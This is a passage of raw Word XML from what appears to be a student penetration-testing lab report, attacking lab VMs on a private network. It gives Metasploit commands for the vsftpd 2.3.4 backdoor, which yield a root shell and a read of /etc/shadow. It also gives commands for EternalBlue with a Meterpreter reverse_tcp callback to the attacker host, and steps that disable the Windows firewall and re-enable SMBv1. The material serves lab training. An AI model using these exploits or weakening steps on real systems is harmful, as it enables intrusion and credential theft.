    <w:p w14:paraId="69F58B4C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="0BEDDACC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="3EEF8513" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Evidence of Success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0EFE4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Root shell obtained on 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8FA3F8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Command id confirms </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10922608" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Full filesystem access confirmed; /etc/passwd and /etc/shadow read successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C9B894" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MITRE ATT&amp;CK: T1190 (Exploit Public-Facing Application), T1059.004 (Unix Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BADE08" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="15E4B1B3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>CODE-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181DCE0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Open Metasploit (Kali terminal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E031D5E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve"> Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A8E7F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Step 2 — Run the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46895A01" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4EB73A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>set RHOSTS 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD7DDE6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10689261" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="16C45434" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> When blank cursor appears, type these:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DF14E1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30A1E0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DBEF9AC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D1985" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448DB96" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A1CBBEA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B620994" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>ls   -la  /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B163920" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E9A499B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="60069600" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="77B55DE8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00130964">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665175E9" wp14:editId="5E254C13">
            <wp:extent cx="5731510" cy="3199130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1259238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238596" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3199130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E07A4E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="55C0C0E6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="001A04E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57E46C56" wp14:editId="711D0D9C">
            <wp:extent cx="5731510" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="852878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78996" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB52B18" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="67431501" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00A529BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02A008DF" wp14:editId="5080F567">
            <wp:extent cx="5731510" cy="3201670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="242295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295427" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3201670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389A6AD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="22CBF020" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="04C7B4B9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="000732E4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E535891" wp14:editId="5E79B5F3">
            <wp:simplePos x="914400" y="4514850"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3249295"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="878856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856532" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3249295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CE06A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasplotable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 inside kali using for code run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA4016" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="70A97650" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="003414F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E460E1B" wp14:editId="6098120D">
            <wp:extent cx="5731510" cy="3203575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="511335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335544" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3203575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="302CD1AD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C1280">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F95A75" wp14:editId="2D101D43">
            <wp:extent cx="5731510" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141182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82901" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4274A201" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="0F77D722" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00C44BF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3F5640" wp14:editId="3EDCB6F5">
            <wp:extent cx="5731510" cy="3213735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1965687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687115" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3213735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0384F3DE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="1E8C4E30" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00816640" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00816640">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Exploit B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (VM 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00816640">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00816640">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00816640">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MS17-010 on Windows 7 (T1210)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A0464E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Vulnerability Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5E106" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">MS17-010 (CVE-2017-0144 / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>): A critical vulnerability in Microsoft's implementation of the SMBv1 protocol. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the target system with SYSTEM-level privileges by sending specially crafted SMB packets. This exploit was famously used in the WannaCry ransomware campaign of 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E866FFC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Preconditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2682D0FE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Target 192.168.56.103 running Windows 7 SP1 with SMBv1 enabled on TCP port 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03986DD4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MS17-010 patch (KB4012212) NOT applied to the target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA116C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>No host-based firewall blocking SMB traffic from attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B0093" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Exploit Method (High Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91E4E9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Metasploit module exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ms17_010_eternalblue was selected. The module exploits a buffer overflow in the SMBv1 srv.sys driver. A staged Meterpreter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload was used to establish an encrypted command-and-control channel back to the Kali attacker host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407B2DC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Commands (High Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26657146" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>msf6 &gt; use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB74B9F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>msf6 &gt; set RHOSTS 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCC749" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>msf6 &gt; set LHOST 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D62206" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>msf6 &gt; set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FE4063D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>msf6 &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D025A1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>[*] Meterpreter session 2 opened (192.168.56.104:4444 -&gt; 192.168.56.103:XXXXX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414078AA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  =&gt;  Server username: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161F03E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="054A563D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB223A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">For windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCCA28" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3BCB">
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3BCB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3BCB">
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3BCB">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3BCB">
        <w:t>allprofiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3BCB">
        <w:t xml:space="preserve"> state off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A45E7D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="007419D5">
        <w:t>reg add "HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007419D5">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007419D5">
        <w:t>\Services\mrxsmb10" /v Start /t REG_DWORD /d 2 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C9A1D9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="006B7572">
        <w:t>reg add "HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B7572">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B7572">
        <w:t>\Services\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B7572">
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B7572">
        <w:t>\Parameters" /v SMB1 /t REG_DWORD /d 1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F52E3C3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F89944" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="006B7572">
        <w:t>shutdown /r /t 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C8EFC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">After restart  on kali Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA625BF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0403062E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310B482" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>set RHOSTS 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E98FA2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>set LHOST 192.168.56.104</w:t>
      </w:r>
    </w:p>
